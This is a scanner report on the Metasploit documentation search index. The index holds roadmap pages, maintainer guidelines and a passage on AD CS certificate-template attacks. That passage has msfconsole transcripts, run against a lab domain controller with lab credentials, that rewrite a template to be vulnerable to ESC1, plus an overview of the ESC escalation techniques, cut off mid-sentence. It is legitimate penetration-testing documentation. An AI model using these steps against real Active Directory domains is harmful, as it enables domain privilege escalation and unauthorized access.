https://docs.metasploit.com/assets/js/search-data.json

제출된 URL:
https://docs.metasploit.com/assets/js/search-data.json
보고서 완료:

링크 · 0개 결과

페이지에서 식별된 외부 링크

JavaScript 변수 · 3개 결과

페이지의 창 개체에 로드된 전역 JavaScript 변수는 함수 외부에서 선언된 변수로, 현재 범위 내에서 코드의 어느 부분에서나 액세스할 수 있습니다

이름유형
onbeforetoggleobject
documentPictureInPictureobject
onscrollendobject

콘솔 로그 메시지 · 1개 결과

웹 콘솔에 기록된 메시지

유형카테고리로그
errornetwork
URL
https://docs.metasploit.com/favicon.ico
텍스트
Failed to load resource: the server responded with a status of 404 ()

HTML

페이지의 원시 HTML 본문

<html><head><meta name="color-scheme" content="light dark"></head><body><pre style="word-wrap: break-word; white-space: pre-wrap;">{"0": {
    "doc": "2017 Roadmap Review",
    "title": "Metasploit’s 2017 Roadmap Review",
    "content": "In 2017, we published our first open roadmap for Metasploit development. How did we do? For achievements: . | The Metasploit data model backend: we did a lot of design work on this, and got a couple of initial Proof-of-Concept project built. You can see a video of it here: https://www.youtube.com/watch?v=hvuy6A-ie1g. In the mean time, we started merging parts of the main development branch . | The first pass of external session handling landed with the metasploit-proxy project. | Independent modules that run in isolation did land, along with a hand full of new modules demonstrating the advantages of the design, including multi-language support. | The ruby_smb project made a lot of progress, with support incorporated into several existing modules. Full client-side support is also available for testing now. | Native iOS and macOS support landed, along with many new IoT and router exploits. | Meterpreter shrank almost 4x thanks to the new cryptTLV packet obfuscation support, and the removal of OpenSSL. | . Things we didn’t quite finish: . | Metasploit’s RESTful interface was not complete in 2017, so we will continue it into 2018. | Session handling as a separate process was implemented with the https://github.com/rapid7/metasploit-aggregator project, but more work needs to be done to improve scalability and usability. | Asynchronous session support remains on the drawing board. | SOCKS5 support did not land, but Metasploit did gain a lot more support for running modules externally as separate processes, and gained initial support for running modules in Python. | Modernized payload generation with new tools continues to be researched. | . ",
    "url": "/docs/development/roadmap/2017-roadmap-review.html#metasploits-2017-roadmap-review",
    "relUrl": "/docs/development/roadmap/2017-roadmap-review.html#metasploits-2017-roadmap-review"
  },"1": {
    "doc": "2017 Roadmap Review",
    "title": "2017 Roadmap Review",
    "content": " ",
    "url": "/docs/development/roadmap/2017-roadmap-review.html",
    "relUrl": "/docs/development/roadmap/2017-roadmap-review.html"
  },"2": {
    "doc": "2017 Roadmap",
    "title": "Metasploit’s 2017 Roadmap",
    "content": "Starting in 2017, we will provide an open roadmap for setting our goals for the year. The goals are based on many discussions we have had over the past year with users, developers, and customers. The intent is to provide focus for core developers and contributors alike, so that we can together work toward a common vision for how we want Metasploit to evolve. This year, the themes for Metasploit are modularity, reusability, and reliability. Metasploit has grown organically over the years into a very large project, combining thousands of modules, payloads, a database, session handling, user interaction and more into a single monolithic application. While the design has served us well, it has reached some limits for maintainability and agility. While we continue to refactor, improve, and reorganize Metasploit, large-scale improvements become increasingly difficult and highlight fragility in the overall system, due to its highly interdependent design. We want to allow users to effortlessly contribute to the portions of Metasploit they are interested in, and be able to reuse code, both from inside and and outside of the project. Language and licensing constraints have presented barriers to users, both real and imagined. Python, Go, C# and other languages are dominating influences on the infosec community. We would like to be able to welcome more developers, researchers, and tooling into the Metasploit ecosystem, taking advantage of the best-in-breed and avoiding not-invented-here syndrome wherever possible. In short, we want to develop reusable, modular, and reliable services to enable researchers, pen-testers, students, and red-teamers to work efficiently, have access to the latest technologies and techniques, and to continue to grow the Metasploit community. ",
    "url": "/docs/development/roadmap/2017-roadmap.html#metasploits-2017-roadmap",
    "relUrl": "/docs/development/roadmap/2017-roadmap.html#metasploits-2017-roadmap"
  },"3": {
    "doc": "2017 Roadmap",
    "title": "The roadmap",
    "content": ". | The Metasploit data model backend should be separated into its own project. Plans include a data service that provides a RESTful interface, both an event-oriented and classic workspace-oriented view of incoming data, improved performance, and easy direct interoperability with other tools. | Session handling should be able to operate independently of framework, allowing users to share sessions and allowing servers to be as performant, reliable, and light-weight as possible. We have already begun a project called ‘metasploit-aggregator’ which is a first generation of this design. Once this is complete, direct integration into other frameworks should also be possible. | Metasploit should support asynchronous sessions. Many testers today use asynchronous frameworks like Empire to maintain light-weight persistence or a footholds into a network, then have to pivot to Meterpreter for interactive sessions. We would like to be able seamlessly support both modes of operation, including the ability to run post exploitation modules and modules over pivots asynchronously as well. | Metasploit should support running exploit and auxiliary modules in an isolated mode. Plans are underway to support supporting an RPC-style module API to Metasploit framework, providing core services like payload and session handling, network routing, reporting and logging. Modules are run as child processes to Metasploit, and are only loaded into memory as-needed. Networking from a module point-of-view will be handled via SOCKS5 proxy support, hooking the child environment, or remote API calls, largely removing the need for specially-crafted socket objects or changes to 3rd-party protocol libraries. Modules, when written for the Metasploit API, could even be tested and used independently from the full Metasploit framework. | . In addition to these primary goals, we’d also like to explore: . | SMB 2.0 SMB 1.0 increasingly being disabled in many networks, making Metasploit modules using this protocol ineffective. We would like to implement at least server-side support for SMB 2.0, both for sharing files and for named pipe communications. | iOS and macOS support The mettle and python meterpreter payloads will continue evolving to further support OS X and iOS, along with more post exploitation support. | Native Android support in Mettle We began the work last year with mettle now supporting all of the basic operations for a Meterpreter implementation. We would like to continue adding Android post-exploitation capabilities to mettle as well. | Streamlining Windows Meterpreter mettle soon will replace the original POSIX meterpreter, which will reduce the size of the Windows meterpreter. Switching from OpenSSL to native SChannel support will simplify and shrink Windows meterpreter, allowing to focus on what it supports best. | Router and IoT research We would like to continue research and support for embedded device exploitation and first-class support for resource-constrained environments. | Modernizing payload generation We are investigating being able to integrate with third-party toolchains for building assembly, C, .NET, Java, on the fly, making it easy for a user to acquire the and use the tools, while providing first-class support for many architectures and platforms. | . ",
    "url": "/docs/development/roadmap/2017-roadmap.html#the-roadmap",
    "relUrl": "/docs/development/roadmap/2017-roadmap.html#the-roadmap"
  },"4": {
    "doc": "2017 Roadmap",
    "title": "2017 Roadmap",
    "content": " ",
    "url": "/docs/development/roadmap/2017-roadmap.html",
    "relUrl": "/docs/development/roadmap/2017-roadmap.html"
  },"5": {
    "doc": "Manage certificate templates",
    "title": "AD CS Certificate Template Exploitation",
    "content": "This module can read, write, update, and delete AD CS certificate templates from a Active Directory Domain Controller. The READ, UPDATE, and DELETE actions will write a copy of the certificate template to disk that can be restored using the CREATE or UPDATE actions. The CREATE and UPDATE actions require a certificate template data file to be specified to define the attributes. Template data files are provided to create a template that is vulnerable to ESC1, ESC2, and ESC3. This module is capable of exploiting ESC4. In order for the auxiliary/admin/ldap/ad_cs_cert_template module to succeed, the authenticated user must have the necessary permissions to perform the specified action on the target object (the certificate specified in CERT_TEMPLATE). ",
    "url": "/docs/pentesting/active-directory/ad-certificates/ad_cs_cert_template.html#ad-cs-certificate-template-exploitation",
    "relUrl": "/docs/pentesting/active-directory/ad-certificates/ad_cs_cert_template.html#ad-cs-certificate-template-exploitation"
  },"6": {
    "doc": "Manage certificate templates",
    "title": "Lab setup",
    "content": "Follow the steps in the Installing AD CS documentation. ",
    "url": "/docs/pentesting/active-directory/ad-certificates/ad_cs_cert_template.html#lab-setup",
    "relUrl": "/docs/pentesting/active-directory/ad-certificates/ad_cs_cert_template.html#lab-setup"
  },"7": {
    "doc": "Manage certificate templates",
    "title": "Module usage",
    "content": "The admin/ldap/ad_cs_cert_template module is generally used to update a certificate template as part of an ESC4 attack. | From msfconsole | Do: use auxiliary/admin/ldap/ad_cs_cert_template | Set the RHOSTS, USERNAME and PASSWORD options | Set the CERT_TEMPLATE option to the name of the target certificate template | Set the ACTION b. For the UPDATE action, set the TEMPLATE_FILE option c. For the CREATE action, optionally set the TEMPLATE_FILE option | Run the module and see the operation complete successfully | . ",
    "url": "/docs/pentesting/active-directory/ad-certificates/ad_cs_cert_template.html#module-usage",
    "relUrl": "/docs/pentesting/active-directory/ad-certificates/ad_cs_cert_template.html#module-usage"
  },"8": {
    "doc": "Manage certificate templates",
    "title": "Actions",
    "content": "CREATE . Create the certificate template in the LDAP server. If no TEMPLATE_FILE is specified, a new certificate template will be created based on the Microsoft-builtin SubCA template with a default security descriptor. If the TEMPLATE_FILE is specified, the attributes it defines are merged with the SubCA template. This allows attributes such as the security descriptor and name to be defined. READ . Read the certificate template from the LDAP server. A copy will be saved to disk. UPDATE . Update the certificate template in the LDAP server. The TEMPLATE_FILE must be specified and will be used to read attributes to set on the certificate template object. The TEMPLATE_FILE option can be set to a previously stored template file to restore the object to a previous state. DELETE . Delete the certificate template in the LDAP server. This is a destructive action. ",
    "url": "/docs/pentesting/active-directory/ad-certificates/ad_cs_cert_template.html#actions",
    "relUrl": "/docs/pentesting/active-directory/ad-certificates/ad_cs_cert_template.html#actions"
  },"9": {
    "doc": "Manage certificate templates",
    "title": "Options",
    "content": "CERT_TEMPLATE . The remote certificate template name. This is used as the common name (CN) for the LDAP object. TEMPLATE_FILE . This is a local template file from which to read object attributes from. Two file formats are supported, JSON and YAML. The file format is determined by the extension so the file must end in either .json or .yaml. The JSON format . The JSON file format is a hash with attribute name keys and ASCII-hex encoded values. These files are compatible with Certipy’s template command. This module uses the JSON file format when storing copies of certificate to disk. The YAML format . The YAML file format is similar to the JSON file format, but takes advantage of YAML’s ability to include comments. The file consists of a hash with attribute name keys and value strings. The nTSecurityDescriptor file can be either a binary string representing a literal value, or a security descriptor defined in Microsoft’s Security Descriptor Definition Language (SDDL). Premade configuration templates provided by Metasploit use this format. ",
    "url": "/docs/pentesting/active-directory/ad-certificates/ad_cs_cert_template.html#options",
    "relUrl": "/docs/pentesting/active-directory/ad-certificates/ad_cs_cert_template.html#options"
  },"10": {
    "doc": "Manage certificate templates",
    "title": "Scenarios",
    "content": "For steps on exploiting ESC4, see Exploiting ESC4. Creating A Certificate Template . In this scenario, the operator uses the module to create a new certificate template. Either the default local template can be used to make one vulnerable to ESC1, or a previously saved configuration can be used. In the following example, the TEMPLATE_FILE option is used to restore the settings from a previously deleted template. msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; use auxiliary/admin/ldap/ad_cs_cert_template msf6 auxiliary(admin/ldap/ad_cs_cert_template) &amp;gt; set RHOSTS 192.168.159.10 RHOSTS =&amp;gt; 192.168.159.10 msf6 auxiliary(admin/ldap/ad_cs_cert_template) &amp;gt; set USERNAME aliddle USERNAME =&amp;gt; aliddle msf6 auxiliary(admin/ldap/ad_cs_cert_template) &amp;gt; set PASSWORD Password1! PASSWORD =&amp;gt; Password1! msf6 auxiliary(admin/ldap/ad_cs_cert_template) &amp;gt; set CERT_TEMPLATE ESC4-Test CERT_TEMPLATE =&amp;gt; ESC4-Test msf6 auxiliary(admin/ldap/ad_cs_cert_template) &amp;gt; set ACTION CREATE ACTION =&amp;gt; CREATE msf6 auxiliary(admin/ldap/ad_cs_cert_template) &amp;gt; set TEMPLATE_FILE /home/smcintyre/.msf4/loot/20230505102851_default_192.168.159.10_windows.ad.cs.te_242316.json TEMPLATE_FILE =&amp;gt; /home/smcintyre/.msf4/loot/20230505102851_default_192.168.159.10_windows.ad.cs.te_242316.json msf6 auxiliary(admin/ldap/ad_cs_cert_template) &amp;gt; run [*] Running module against 192.168.159.10 [+] Successfully bound to the LDAP server! [*] Discovering base DN automatically [*] 192.168.159.10:389 Getting root DSE [+] 192.168.159.10:389 Discovered base DN: DC=msflab,DC=local [*] Creating: CN=ESC4-Test,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=msflab,DC=local [+] The operation completed successfully! [*] Auxiliary module execution completed msf6 auxiliary(admin/ldap/ad_cs_cert_template) &amp;gt; . Deleting A Certificate Template . In this scenario, the operator uses the module to delete the ESC4-Test certificate template. A backup of the original certificate’s data is made before it is deleted. This file can be used with the CREATE action to restore the certificate template. msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; use auxiliary/admin/ldap/ad_cs_cert_template msf6 auxiliary(admin/ldap/ad_cs_cert_template) &amp;gt; set RHOSTS 192.168.159.10 RHOSTS =&amp;gt; 192.168.159.10 msf6 auxiliary(admin/ldap/ad_cs_cert_template) &amp;gt; set USERNAME aliddle USERNAME =&amp;gt; aliddle msf6 auxiliary(admin/ldap/ad_cs_cert_template) &amp;gt; set PASSWORD Password1! PASSWORD =&amp;gt; Password1! msf6 auxiliary(admin/ldap/ad_cs_cert_template) &amp;gt; set CERT_TEMPLATE ESC4-Test CERT_TEMPLATE =&amp;gt; ESC4-Test msf6 auxiliary(admin/ldap/ad_cs_cert_template) &amp;gt; set ACTION DELETE ACTION =&amp;gt; DELETE msf6 auxiliary(admin/ldap/ad_cs_cert_template) &amp;gt; run [*] Running module against 192.168.159.10 [+] Successfully bound to the LDAP server! [*] Discovering base DN automatically [*] 192.168.159.10:389 Getting root DSE [+] 192.168.159.10:389 Discovered base DN: DC=msflab,DC=local [+] Read certificate template data for: CN=ESC4-Test,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=msflab,DC=local [*] Certificate template data written to: /home/smcintyre/.msf4/loot/20230505102851_default_192.168.159.10_windows.ad.cs.te_242316.json [+] The operation completed successfully! [*] Auxiliary module execution completed msf6 auxiliary(admin/ldap/ad_cs_cert_template) &amp;gt; . Reading A Certificate Template . In this scenario, the operator uses the module to read the configuration of the default User certificate template. msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; use auxiliary/admin/ldap/ad_cs_cert_template msf6 auxiliary(admin/ldap/ad_cs_cert_template) &amp;gt; set RHOSTS 192.168.159.10 RHOSTS =&amp;gt; 192.168.159.10 msf6 auxiliary(admin/ldap/ad_cs_cert_template) &amp;gt; set USERNAME aliddle USERNAME =&amp;gt; aliddle msf6 auxiliary(admin/ldap/ad_cs_cert_template) &amp;gt; set PASSWORD Password1! PASSWORD =&amp;gt; Password1! msf6 auxiliary(admin/ldap/ad_cs_cert_template) &amp;gt; set CERT_TEMPLATE User CERT_TEMPLATE =&amp;gt; User msf6 auxiliary(admin/ldap/ad_cs_cert_template) &amp;gt; set ACTION READ ACTION =&amp;gt; READ msf6 auxiliary(admin/ldap/ad_cs_cert_template) &amp;gt; run [*] Running module against 192.168.159.10 [+] Successfully bound to the LDAP server! [*] Discovering base DN automatically [*] 192.168.159.10:389 Getting root DSE [+] 192.168.159.10:389 Discovered base DN: DC=msflab,DC=local [+] Read certificate template data for: CN=User,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=msflab,DC=local [*] Certificate template data written to: /home/smcintyre/.msf4/loot/20230505125728_default_192.168.159.10_windows.ad.cs.te_691087.json [*] Certificate Template: [*] distinguishedName: CN=User,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=msflab,DC=local [*] displayName: User [*] objectGUID: ceed9142-d00f-459e-9694-02eb59ea1ec8 [*] msPKI-Certificate-Name-Flag: 0xa6000000 [*] * CT_FLAG_SUBJECT_ALT_REQUIRE_UPN [*] * CT_FLAG_SUBJECT_ALT_REQUIRE_EMAIL [*] * CT_FLAG_SUBJECT_REQUIRE_EMAIL [*] * CT_FLAG_SUBJECT_REQUIRE_DIRECTORY_PATH [*] msPKI-Enrollment-Flag: 0x00000029 [*] * CT_FLAG_INCLUDE_SYMMETRIC_ALGORITHMS [*] * CT_FLAG_PUBLISH_TO_DS [*] * CT_FLAG_AUTO_ENROLLMENT [*] msPKI-RA-Signature: 0x00000000 [*] pKIExtendedUsage: [*] * 1.3.6.1.4.1.311.10.3.4 [*] * 1.3.6.1.5.5.7.3.4 [*] * 1.3.6.1.5.5.7.3.2 [+] The operation completed successfully! [*] Auxiliary module execution completed msf6 auxiliary(admin/ldap/ad_cs_cert_template) &amp;gt; . Updating A Certificate Template . In this scenario, the operator uses the module to update and reconfigure the ESC4-Test certificate template to make it vulnerable to ESC1 (the default template settings). This process first makes a backup of the certificate data that can be used later. The local certificate template data can be modified to set a custom security descriptor. msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; use auxiliary/admin/ldap/ad_cs_cert_template msf6 auxiliary(admin/ldap/ad_cs_cert_template) &amp;gt; set RHOSTS 192.168.159.10 RHOSTS =&amp;gt; 192.168.159.10 msf6 auxiliary(admin/ldap/ad_cs_cert_template) &amp;gt; set USERNAME aliddle USERNAME =&amp;gt; aliddle msf6 auxiliary(admin/ldap/ad_cs_cert_template) &amp;gt; set PASSWORD Password1! PASSWORD =&amp;gt; Password1! msf6 auxiliary(admin/ldap/ad_cs_cert_template) &amp;gt; set CERT_TEMPLATE ESC4-Test CERT_TEMPLATE =&amp;gt; ESC4-Test msf6 auxiliary(admin/ldap/ad_cs_cert_template) &amp;gt; set ACTION UPDATE ACTION =&amp;gt; UPDATE msf6 auxiliary(admin/ldap/ad_cs_cert_template) &amp;gt; set VERBOSE true VERBOSE =&amp;gt; true msf6 auxiliary(admin/ldap/ad_cs_cert_template) &amp;gt; run [*] Running module against 192.168.159.10 [+] Successfully bound to the LDAP server! [*] Discovering base DN automatically [*] 192.168.159.10:389 Getting root DSE [+] 192.168.159.10:389 Discovered base DN: DC=msflab,DC=local [+] Read certificate template data for: CN=ESC4-Test,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=msflab,DC=local [*] Certificate template data written to: /home/smcintyre/.msf4/loot/20230505083802_default_192.168.159.10_windows.ad.cs.te_593597.json [*] Parsing SDDL text: D:PAI(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;AU) [+] The operation completed successfully! [*] Auxiliary module execution completed msf6 auxiliary(admin/ldap/ad_cs_cert_template) &amp;gt; . ",
    "url": "/docs/pentesting/active-directory/ad-certificates/ad_cs_cert_template.html#scenarios",
    "relUrl": "/docs/pentesting/active-directory/ad-certificates/ad_cs_cert_template.html#scenarios"
  },"11": {
    "doc": "Manage certificate templates",
    "title": "Manage certificate templates",
    "content": " ",
    "url": "/docs/pentesting/active-directory/ad-certificates/ad_cs_cert_template.html",
    "relUrl": "/docs/pentesting/active-directory/ad-certificates/ad_cs_cert_template.html"
  },"12": {
    "doc": "Release Notes",
    "title": "Writing Release Notes",
    "content": "Okay, so now that you know how to add a release note, you’re wondering what you’re supposed to write. Basically, a release note summarizes the pull request and describes the value of the fix/feature to the user. Each release note has a title, a PR number, and a brief description. Here’s an example of what a release note looks likes: . The Beholder plugin automatically captures keystrokes, screenshots, and webcam snapshots from your active sessions. Run this plugin to collect data from your compromised targets every 30 seconds. ",
    "url": "/docs/development/maintainers/process/adding-release-notes-to-prs.html#writing-release-notes",
    "relUrl": "/docs/development/maintainers/process/adding-release-notes-to-prs.html#writing-release-notes"
  },"13": {
    "doc": "Release Notes",
    "title": "Types of Release Notes",
    "content": "There are three types of release notes: . | Enhancement | Fix | Modules | . Release Notes for Enhancements . An enhancement indicates that an improvement or new feature has been added to the framework. Enhancements include things like auxiliary modules, post-exploitation modules, and new payloads. When you write release notes for an enhancement, you should try to answer the following questions: . | What is the enhancement? | Why is it valuable or important to users? | How can they use it? | . For example, the following is a release note for an enhancement: . The new ‘resolve’ command enables you to perform DNS lookups with Meterpreter, without leaving the session to run additional modules. To resolve host names on the target, you can run the ‘resolve’ command followed by the host name. For example, in the Meterpreter prompt, you can type something like ‘resolve rapid7.com’ to view the host resolutions for Rapid7. Release Notes for Fixes . A fix is for an issue that caused a particular feature or functionality to not work the way it’s expected to work. Basically, a defect indicates that something was broken, and we’ve fixed it. When you write release notes for a fix, you should try to answer the following questions: . | What was broken? | How was it fixed? | Why is this important to users? | . Here’s an example for a fix: . The email header contained duplicate date and subject headers, which caused email servers like AWS SES, to reject the emails. This fix removes the duplicate headers so that campaigns can send emails successfully. Release Notes for Modules . An exploit is a module that takes advantage of a vulnerability and provides some type of access to the target. We call out exploits explicitly because they’re the hotness. When you write release notes for an exploit, you should try to answer the following questions: . | What vulnerability is the module exploiting? | What type of access can you achieve with the module? | Do you need credentials to exploit the vulnerability? | . And finally, here’s an example for exploits: . This module allows you to exploit HP Data Protector, a backup and recovery system, to remotely upload files to the file share. Versions 6.10, 6.10, and 6.20 are vulnerable. You don’t need to authenticate to exploit this vulnerability. ",
    "url": "/docs/development/maintainers/process/adding-release-notes-to-prs.html#types-of-release-notes",
    "relUrl": "/docs/development/maintainers/process/adding-release-notes-to-prs.html#types-of-release-notes"
  },"14": {
    "doc": "Release Notes",
    "title": "Release Notes",
    "content": "Release notes inform our users about the stuff we’re shipping in each release. By looking at our release notes, our users should be able to easily understand what’s new, what’s fixed, and what’s changed in the release. Therefore, all PRs, except for minor fixes and tweaks, must have release notes. To add a release note to a pull request, you’ll need to add it as a comment, like so: . You’ll need to tag the comment for inclusion in the release notes by using the # Release Notes heading. After you apply the release notes heading, you can enter the release notes text you want to use. That’s it! After you add the release notes text, we’ll be able to extract them from the pull requests when we run our release notes script and compile them into a single document. ",
    "url": "/docs/development/maintainers/process/adding-release-notes-to-prs.html",
    "relUrl": "/docs/development/maintainers/process/adding-release-notes-to-prs.html"
  },"15": {
    "doc": "API",
    "title": "API",
    "content": "View the latest API docs at: . https://docs.metasploit.com/api/ . ",
    "url": "/docs/development/developing-modules/libraries/api.html",
    "relUrl": "/docs/development/developing-modules/libraries/api.html"
  },"16": {
    "doc": "Assigning Labels",
    "title": "Assigning Labels",
    "content": "Maintainers can assign labels to both issues and pull requests. Attic . When we move something to the attic it means that what you submitted is a thing that we want but the circumstances were not quite right for landing it. Sometimes this is on us, and sometimes the contribution needs more work. We recognize that contributors work on the PRs they submit at their own pace. Take a look at the comments and review suggestions on your PR, and feel free to re-open it if and when you have time to work on it again. Don’t think you’ll be able to get it across the finish line? Find a community champion to do it for you. Bug . Any PR that fixes a bug or an issue that raises awareness of a bug in the framework. Breaking Change . Features that are great, but will cause breaking changes and should be deployed on a large release. Code Quality . When a PR improves code quality. Confirmed . Specifically for issues that have been confirmed by a committer. Docs . Documentation changes, such as YARD markup, or README.md, or something along those lines. External Modules . PRs dealing with modules run as their own process. Heartbleed . Has to do with heartbleed. This will go away soon, but there are three outstanding still… . Hotness . Something we’re really excited about. Library . Touches something in /lib. Meterpreter . Has to do with Meterpreter, or depends on a Meterpreter change to land to work. Misc . Plugins and scripts, anything that’s not otherwise defined. Module . Touches something in /modules. Needs Linting . The module needs additional work to pass our automated linting rules. Needs More Information . The issue lacks enough detail to replicate/resolve successfully. Newbie Friendly . Something that’s pretty easy to test or tackle. Needs unique branch . Your submitted a PR from your master branch. Because of how GitHub tracks changes between branches and what got added in a particular PR, we don’t accept contributions from the master branch of your fork. All branches are required to be unique. If your PR is closed because of this, create a new branch with that code and we’ll be happy to look at it again! . git checkout -b &amp;lt;BRANCH_NAME&amp;gt; git push &amp;lt;your_fork_remote&amp;gt; &amp;lt;BRANCH_NAME&amp;gt; . This helps protect the process, ensure users are aware of commits on the branch being considered for merge, allows for a location for more commits to be offered without mingling with other contributor changes and allows contributors to make progress while a PR is still being reviewed. Needs-docs . When a module is uploaded without a corresponding documentation file, add this label in indicate docs are required . Not Stale . Label to stop an issue from being auto closed. Osx . Label for any osx related work. Payload . Touches something related to a payload. RN (Release notes) . There are a series of labels that are added to all PRs when they are landed that define the release notes for the PR. They are denoted by the rn- prefix and they are important as they are used by automation to track metasploit-framework statistics: . rn-enhancement . Release notes for an enhancement. rn-fix . Release notes for a fix. rn-modules . Release notes for new or majorly enhanced modules. rn-no-release-notes . The PR is too small or insignificant to warrant release notes. rn-wiki . Release notes for Metasploit Framework wiki. Stale . Marks an issue as stale, to be closed if no action is taken. Suggestion . Suggestions for new functionality. Suggestion-docs . New documentation suggestions. Suggestion-feature . New feature suggestions. Suggestion-Module . New module suggestions. Usability . Usability improvements. YARD . YARD Documentation Tasks for API Documentation. ",
    "url": "/docs/development/maintainers/process/assigning-labels.html",
    "relUrl": "/docs/development/maintainers/process/assigning-labels.html"
  },"17": {
    "doc": "Attacking AD CS ESC Vulnerabilities Using Metasploit",
    "title": "Setting Up An AD CS Target",
    "content": "Follow the instructions here to set up an AD CS server for testing purposes. ",
    "url": "/docs/pentesting/active-directory/ad-certificates/attacking-ad-cs-esc-vulnerabilities.html#setting-up-an-ad-cs-target",
    "relUrl": "/docs/pentesting/active-directory/ad-certificates/attacking-ad-cs-esc-vulnerabilities.html#setting-up-an-ad-cs-target"
  },"18": {
    "doc": "Attacking AD CS ESC Vulnerabilities Using Metasploit",
    "title": "Introduction to AD CS Vulnerabilities",
    "content": "flowchart TD subgraph ad_cs_cert_templates[&amp;lt;b&amp;gt;ad_cs_cert_templates&amp;lt;/b&amp;gt;] ESC4(ESC4) update_template[&amp;lt;i&amp;gt;Update Template&amp;lt;/i&amp;gt;] ESC4 -- abuse privileges --&amp;gt; update_template end subgraph icpr_cert[&amp;lt;b&amp;gt;icpr_cert&amp;lt;/b&amp;gt;] ESC1(ESC1) ESC2(ESC2) ESC3(ESC3) ESC13(ESC13) ESC15(ESC15) alt_subject[&amp;lt;i&amp;gt;Alternate Subject Issuance&amp;lt;/i&amp;gt;] add_policies[&amp;lt;i&amp;gt;Alternate Subject Issuance&amp;lt;/i&amp;gt;&amp;lt;br&amp;gt;and&amp;lt;br&amp;gt;&amp;lt;i&amp;gt;Add Policy OIDs&amp;lt;/i&amp;gt;] as_eagent[&amp;lt;i&amp;gt;Enrollment Agent Issuance&amp;lt;/i&amp;gt;] normal[&amp;lt;i&amp;gt;Normal Issuance&amp;lt;/i&amp;gt;] ESC1 --&amp;gt; alt_subject ESC2 --&amp;gt; as_eagent ESC3 --&amp;gt; as_eagent ESC13 --&amp;gt; normal ESC15 --&amp;gt; add_policies as_eagent -- use new certificate --&amp;gt; normal end subgraph kerberos/get_ticket[&amp;lt;b&amp;gt;kerberos/get_ticket&amp;lt;/b&amp;gt;] PKINIT[&amp;lt;i&amp;gt;PKINIT&amp;lt;/i&amp;gt;] end subgraph ldap/ldap_login[&amp;lt;b&amp;gt;ldap/ldap_login&amp;lt;/b&amp;gt;] SCHANNEL[&amp;lt;i&amp;gt;SCHANNEL&amp;lt;/i&amp;gt;] end subgraph ldap_esc_vulnerable_cert_finder[&amp;lt;b&amp;gt;ldap_ecs_vulnerable_cert_finder&amp;lt;/b&amp;gt;] find_vulnerable_templates[&amp;lt;i&amp;gt;Find Vulnerable Templates&amp;lt;/i&amp;gt;] end add_policies -- add client authentication oid --&amp;gt; SCHANNEL add_policies -- add certificate request agent oid --&amp;gt; as_eagent alt_subject --&amp;gt; PKINIT alt_subject --&amp;gt; SCHANNEL find_vulnerable_templates --&amp;gt; icpr_cert normal --&amp;gt; PKINIT normal --&amp;gt; SCHANNEL update_template --&amp;gt; ESC1 . The chart above showcases how one can go about attacking five unique AD CS vulnerabilities, taking advantage of various flaws in how certificate templates are configured on an Active Directory Certificate Server. The following sections will walk through each of these steps, starting with enumerating certificate templates that the server has to offer and identifying those that are vulnerable to various misconfigurations and security flaws, followed by creating new certificates using these certificate templates with the icpr_cert Metasploit module, and finally using these certificates to authenticate to the domain as the domain administrator via Kerberos. Each certificate template vulnerability that will be discussed here has a ESC code, such as ESC1, ESC2. These ESC codes are taken from the original whitepaper that SpecterOps published which popularized these certificate template attacks, known as Certified Pre-Owned. In this paper Will Schroeder and Lee Christensen described 8 different domain escalation attacks that they found they could conduct via misconfigured certificate templates: . | ESC1 - Domain escalation via No Issuance Requirements + Enrollable Client Authentication/Smart Card Logon OID templates + CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT . | Exploit Steps | . | ESC2 - Domain escalation via No Issuance Requirements + Enrollable Any Purpose EKU or no EKU . | Exploit Steps | . | ESC3 - Domain escalation via No Issuance Requirements + Certificate Request Agent EKU + no enrollment agent restrictions . | Exploit Steps | . | ESC4 - Domain escalation via misconfigured certificate template access control . | Exploit Steps | . | ESC5 - Domain escalation via vulnerable PKI AD Object Access Control | ESC6 - Domain escalation via the EDITF_ATTRIBUTESUBJECTALTNAME2 setting on CAs + No Manager Approval + Enrollable Client Authentication/Smart Card Logon OID templates | ESC7 - Vulnerable Certificate Authority Access Control | ESC8 - NTLM Relay to AD CS HTTP Endpoints | . Later, additional techniques were disclosed by security researchers: . | ESC9 - No Security Extension - CT_FLAG_NO_SECURITY_EXTENSION flag set in msPKI-EnrollmentFlag. Also StrongCertificateBindingEnforcement not set to 2 or CertificateMappingMethods contains UPN flag. | Certipy 4.0: ESC9 &amp;amp; ESC10, BloodHound GUI, New Authentication and Request Methods — and more! | . | ESC10 - Weak Certificate Mappings - HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\SecurityProviders\\Schannel CertificateMappingMethods contains UPN bit aka 0x4 or HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Kdc StrongCertificateBindingEnforcement is set to 0. | Certipy 4.0: ESC9 &amp;amp; ESC10, BloodHound GUI, New Authentication and Request Methods — and more! | . | ESC11 - Relaying NTLM to ICPR - Relaying NTLM authentication to unprotected RPC interface is allowed due to lack of the IF_ENFORCEENCRYPTICERTREQUEST flag on Config.CA.Interface.Flags. | Relaying to AD Certificate Services over RPC | . | ESC12 - A user with shell access to a CA server using a YubiHSM2 hardware security module can access the CA’s private key. | Shell access to ADCS CA with YubiHSM | . | ESC13 - Domain escalation via issuance policies with group links. | ADCS ESC13 Abuse Technique | Exploit Steps | . | ESC14 - Explicit certificate mappings through altSecurityIdentities write access abuse . | ADCS ESC14 Abuse Technique | . | ESC15 (AKA EKUwu) - Domain escalation via No Issuance Requirements + CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT + Policy OID manipulation . | EKUwu: Not just another AD CS ESC | Exploit Steps | . | . Currently, Metasploit only supports attacking ESC1, ESC2, ESC3, ESC4, ESC13 and ESC15. As such, this page only covers exploiting ESC1 through ESC4, ESC13 and ESC15 at this time. Before continuing, it should be noted that ESC1 is slightly different than ESC2 and ESC3 as the diagram notes above. This is because in ESC1, one has control over the subjectAltName field in the generated certificate, which is also known as the SAN field. This field allows one to specify who the certificate should 